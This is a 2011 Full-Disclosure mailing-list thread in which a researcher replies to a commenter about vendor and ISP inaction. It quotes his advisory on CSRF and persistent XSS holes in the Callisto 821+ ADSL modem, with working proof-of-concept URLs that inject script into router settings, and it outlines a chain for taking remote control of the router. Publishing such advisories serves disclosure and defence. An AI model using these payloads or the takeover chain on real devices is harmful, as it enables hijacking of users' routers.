[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+



Hello 0xd0!

> So, you could maybe have to think if the router has port 80 open and i assume 
> a remote-service

Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto 
821+) is open, but it's accessible only from local - from local computer and 
LAN, and not from Internet (by default it's disabled). And all those hundreds 
of CSRF, XSS and DoS holes which I disclosed, without taking into account 
"unlimited" XSS and DoS holes, allow to bypass this limitation of disallowed 
remote access and to attack control panel from remote. Including it's possible 
to enable via CSRF a remote access from Internet to control panel and then by 
using default login and password (or if worry that user changed it, then make 
via CSRF a new user with specified login and password) log into control panel 
and take router under control.

About such "unlimited" vulnerabilities I wrote in article How to find billion 
of XSS vulnerabilities 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).

> Luckily some isp's do protect your modem, as many are so it seems, coded 
> weakly in the firmware area.


Developer of modem already protected (as they thought) their consumers by 
disallowing access from Internet by default. My ISP Ukrtelecom (already my ex 
ISP) didn't change this setting and also thought it was enough to protect 
clients. After in beginning of April I first time entered into control panel 
and found that it was full of CSRF holes (in addition to default login and 
password), I talked with Ukrtelecom's representative by phone.

And asked him why their company didn't change default login and password and 
not inform all their clients about control panel, the login and password for 
specific model of router (different models have differences and no 
documentation on routers was given to the clients), the fact that default login 
and password was used and not recommended clients to change it. And they 
answered that because by default access from Internet is disallowed, they 
though that everything is secure and their company (holemaking one - with 
multiple holes on multiple their web sites and in their Internet and 
telecommunication services, which I've informed them for last years) don't 
worry about their clients. And on my question about multiple CSRF which can 
remotely change any settings of modem, he didn't answer, because he don't know 
what it is. So attacks from local (from lamers or viruses at local computer or 
LAN) and attacks from Internet on logged in to control panel modem owner are 
possible and not considered as a threat at all by developer of the router and 
this ISP (similar situation can be with other ISPs).

> That is consumer value,and i assume the company has released a patch ?

No, company (Iskra) completely ignored these issues (and there are hundreds of 
holes in their router). They ignored as my first letter from 26th of May, as 
all other letters (24 letters in total during May - July about different 
vulnerabilities). Looks like they don't care about security of their products 
and of their clients. Similarly as ISP Ukrtelecom, which is Iskra's routers 
distributor in Ukraine (possibly only one ISP who distribute these routers) and 
which is also completely ignored security of their own sites, services, routers 
which they sell and of their clients.

So all consumers of Isrka modems should know the truth - the real situation 
with security of the routers of this company. I made my decision (after all 
these holes in Ukrtelecom and Iskra and their ignoring) - I no more using not 
their services, nor their modems. Besides, Iskra is funny company - from their 
official e-mails (mentioned at the site) service@ is not working at all, but 
e-marketing@ works, but they're not answering, not fixing, just ignoring, as 
I've already mentioned.

> why then disclose the thing, i guess you either go one way or the other, know 
> what i mean ?

No I don't :-). But there are always reasons for disclosing vulnerabilities. 
And there are reasons in this particular case and they are obvious and 
mentioned in every my post about this router (besides worrying about security 
of the people which is by default in all my disclosures).

> but yea, nice stuff if xss is your thing. ;')

All these hundreds of CSRF, XSS and DoS holes in this router are nice by its 
own. And yes, there are all found by me. All these holes in Callisto 821+ 
(http://securityvulns.ru/news/ZTE/Callisto/821.html) (from 24 advisories 3APA3A 
forget to put two in July, so they are no listed in this list - I've already 
reminded him two times, so he'd fix it).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
  ----- Original Message ----- 
  From: -= Glowing Sex =- 
  To: MustLive 
  Cc: full-disclosure@xxxxxxxxxxxxxxxxx 
  Sent: Saturday, July 30, 2011 1:42 AM
  Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL 
modem Callisto 821+


  So... advanced...
  So, you could maybe have to think if the router has port 80 open and i assume 
a remote-service,most isp's would have the port 80 remote-assist open for 
possibly helping a customer,I know that is the first thing i switch to 'off' 
,and actually, my isp went thru that with me on install.
  Luckily some isp's do protect your modem, as many are so it seems, coded 
weakly in the firmware area.

  That is consumer value,and i assume the company has released a patch ? 
Usually, you would either contact a vendor and completely see-it-through,asin 
wait for theyre reply, I do not see this in the actual timeline, i only see 
that you have said your working 'with' them, and theyre CEO... why then 
disclose the thing, i guess you either go one way or the other, know what i 
mean ?
  You should have a 2011-*-* - Vendor has now patched the issue regarding this 
, and possibly if it is serious, assigned a bid/cve.
  I am only assuming what i see with other disclosure policies... but yea, nice 
stuff if xss is your thing. ;')
  cheers
  0xd0




  On 30 July 2011 07:30, MustLive <mustlive@xxxxxxxxxxxxxxxxxx> wrote:

    Hello list!

    After discussion with Michael Simpson about these vulnerabilities in
    Callisto 821+, I want to warn you about new multiple security
    vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).

    These are Cross-Site Request Forgery and Cross-Site Scripting
    vulnerabilities. In April I've already drew attention of Ukrtelecom's
    representative (and this modem was bough at Ukrtelecom) about multiple
    vulnerabilities in this model of Callisto modems (and other models also
    could be affected).

    SecurityVulns ID: 11700.

    -------------------------
    Affected products:
    -------------------------

    Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A
    v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
    firmware and also other models of Callisto also must be vulnerable.

    ----------
    Details:
    ----------

    These attacks should be conducted on modem owner, which is logged into
    control panel. Taking into account that it's unlikely to catch him in this
    state, then it's possible to use before-mentioned vulnerabilities
    (http://websecurity.com.ua/5161/) for conducting of remote login (for
    logining him into control panel). After that it's possible to conduct CSRF
    or XSS attack.

    CSRF (WASC-09):

    Every connection in section LAN connections, as default, as other
    connections, has advanced settings. Let's view on example of default
    connection (iplan).

    In section Edit connection in subsection Edit Ip Interface
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
    via CSRF it's possible to change settings (IP, Mask and others) of
    connection.

    In subsection Edit Tcp Mss Clamp
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
    via CSRF it's possible to change settings of connection.

    In subsection Edit Rip Versions
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
    via CSRF it's possible to change settings of connection.

    In subsection Edit NAT
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
    via CSRF it's possible to change settings of connection.

    XSS (WASC-08):

    There are many persistent XSS vulnerabilities in above-mentioned four
    subsections of section Edit connection.

    In subsection Edit Ip Interface:

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    In subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
    situation is similar.

    And also attacks via the names of parameters are possible (when XSS code is
    setting in the name of parameter), which I wrote about earlier
    (http://websecurity.com.ua/5277/).

    In this case the code will be executed immediately, and also at visiting of
    pages http://192.168.1.1/system/events.html and
    http://192.168.1.1/shared/event_log_selection.html.

    ------------
    Timeline:
    ------------

    2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
    which they give (sell) to their clients.
    2011.07.23 - disclosed at my site.
    2011.07.24 - informed developers (Iskratel).

    I mentioned about these vulnerabilities at my site
    (http://websecurity.com.ua/5296/).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/